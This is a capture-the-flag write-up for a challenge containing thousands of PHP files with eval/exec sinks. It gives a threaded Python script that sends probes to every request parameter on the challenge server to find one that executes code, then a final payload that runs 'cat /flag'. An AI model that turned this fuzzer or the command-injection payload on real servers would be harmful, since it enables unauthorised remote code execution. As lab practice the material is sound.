Not much to say about this one: you just grind it out with a script. Open the challenge and it tells you to download www.tar.gz. Unpack it and you get two thousand-plus PHP files. Excuse me??????? Open a few and every PHP file has eval, exec and the like in it, but not all of them are actually usable; in fact, after fuzzing everything, exactly one parameter works. So the plan is to script it and keep trying. Two ways to go:

1. Pull all the files down locally, spin up your own environment with the max connection count raised, fuzz there to find the parameter, then use it against the target.

2. Fuzz the live target directly. From my testing, BUUCTF tolerates a maximum of about 20 concurrent connections. I adapted a script a blogger ran locally, adding a few sleep() calls so unreleased URL connections don't trigger HTTP 429. It runs in about five minutes, not much slower than the blogger's four minutes on a local box.
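Before hammering the target, a quick local pre-scan tells you how big the fuzz space actually is. A minimal sketch, my own addition rather than part of the original script; the unpack directory and the sink list are assumptions for illustration:

import os
import re

SRC_DIR = r"D:\wamp\www\src"  # wherever you unpacked www.tar.gz (assumed path)
SINK = re.compile(r'\b(?:eval|exec|system|assert|passthru)\s*\(')
PARAM = re.compile(r"\$_(?:GET|POST)\['(.*?)'\]")

candidates = 0
for name in os.listdir(SRC_DIR):
    with open(os.path.join(SRC_DIR, name), encoding='utf-8') as f:
        code = f.read()
    # Only files that both contain a dangerous sink and read a request
    # parameter are worth sending probes to.
    if SINK.search(code) and PARAM.search(code):
        candidates += 1

print('%d files contain a sink fed by a request parameter' % candidates)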
import os
import re
import threading
import time

import requests

print('start time: ' + time.asctime(time.localtime(time.time())))
s1 = threading.Semaphore(15)   # BUUCTF tolerates ~20 connections, so stay under that
filePath = r"D:\wamp\www\src"  # directory where www.tar.gz was unpacked
os.chdir(filePath)
requests.adapters.DEFAULT_RETRIES = 5
files = os.listdir(filePath)
session = requests.Session()
session.keep_alive = False     # original author's attempt to stop connection pooling
def get_content(file):
    s1.acquire()
    try:
        print('trying ' + file + ' ' + time.asctime(time.localtime(time.time())))
        # Read the file once; the original called f.read() twice, so the second
        # findall always searched an empty string and POST params were never found.
        with open(file, encoding='utf-8') as f:
            code = f.read()
        gets = re.findall(r"\$_GET\['(.*?)'\]", code)
        posts = re.findall(r"\$_POST\['(.*?)'\]", code)
        # First pass: stuff the probe into every parameter at once. If the marker
        # comes back, at least one parameter reaches eval()/exec().
        params = {m: "echo 'xxxxxx';" for m in gets}
        data = {n: "echo 'xxxxxx';" for n in posts}
        url = 'http://4e199aac-a3a6-4fc4-bf08-7d9b7fbef682.node4.buuoj.cn:81/' + file
        req = session.post(url, data=data, params=params)
        req.close()
        time.sleep(2)  # give the connection time to die off, or BUUCTF returns 429
        req.encoding = 'utf-8'
        content = req.text
        print(content)
        if "xxxxxx" in content:
            # Second pass: retry one parameter at a time to pin down which one works.
            param = None
            for a in gets:
                req = session.get(url, params={a: "echo 'xxxxxx';"})
                content = req.text
                req.close()
                time.sleep(2)
                if "xxxxxx" in content:
                    param = a
                    break
            if param is None:
                for b in posts:
                    req = session.post(url, data={b: "echo 'xxxxxx';"})
                    content = req.text
                    req.close()
                    time.sleep(2)
                    if "xxxxxx" in content:
                        param = b
                        break
            print('exploitable file: ' + file + ' and exploitable parameter: %s' % param)
        print('end time: ' + time.asctime(time.localtime(time.time())))
    finally:
        s1.release()  # release even on errors so the semaphore never leaks

# One worker thread per PHP file; the Semaphore(15) above caps real concurrency.
for i in files:
    t = threading.Thread(target=get_content, args=(i,))
    t.start()
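As a variation on the hard-coded sleep(2) calls, requests can retry 429 responses with backoff on its own. This is my own sketch, not part of the original script; the retry counts are arbitrary, and allowed_methods=None (urllib3 >= 1.26) is needed so POSTs get retried too:

from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry

retry = Retry(
    total=5,                 # at most five retries per request
    backoff_factor=1,        # exponential backoff between attempts
    status_forcelist=[429],  # retry only on Too Many Requests
    allowed_methods=None,    # None = retry all verbs, including POST
)
session.mount('http://', HTTPAdapter(max_retries=retry))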
Final payload: xk0SzyKwfzw.php?Efa5BVG=cat /flag Reference video: https://www.bilibili.com/video/BV1zg411w784?spm_id_from=333.999.0.0
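For completeness, a minimal sketch of the final step, my addition; the node URL is instance-specific and will differ on your BUUCTF instance:

import requests

base = 'http://4e199aac-a3a6-4fc4-bf08-7d9b7fbef682.node4.buuoj.cn:81/'
# The fuzzer reported xk0SzyKwfzw.php / Efa5BVG, so feed it the command directly.
r = requests.get(base + 'xk0SzyKwfzw.php', params={'Efa5BVG': 'cat /flag'})
print(r.text)  # prints the flag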